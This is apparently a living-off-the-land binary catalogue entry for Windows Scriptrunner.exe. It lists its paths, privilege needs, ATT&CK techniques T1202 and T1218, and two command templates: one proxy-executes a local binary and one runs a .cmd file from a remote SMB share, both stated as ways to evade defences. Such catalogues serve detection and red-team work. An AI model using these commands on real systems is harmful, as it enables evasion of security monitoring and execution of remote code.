.. /Scriptrunner.exe
Execute binary through proxy binary to evade defensive counter measures
Paths:
- C:\Windows\System32\scriptrunner.exe
- C:\Windows\SysWOW64\scriptrunner.exe
Execute
-
Executes executable
Scriptrunner.exe -appvscript {PATH:.exe}
- Use case
- Execute binary through proxy binary to evade defensive counter measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1202
- Tags
Execute: EXE
-
Executes cmd file from remote server
ScriptRunner.exe -appvscript {PATH_SMB:.cmd}
- Use case
- Execute binary through proxy binary from external server to evade defensive counter measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218
- Tags
Execute: Remote
Execute: CMD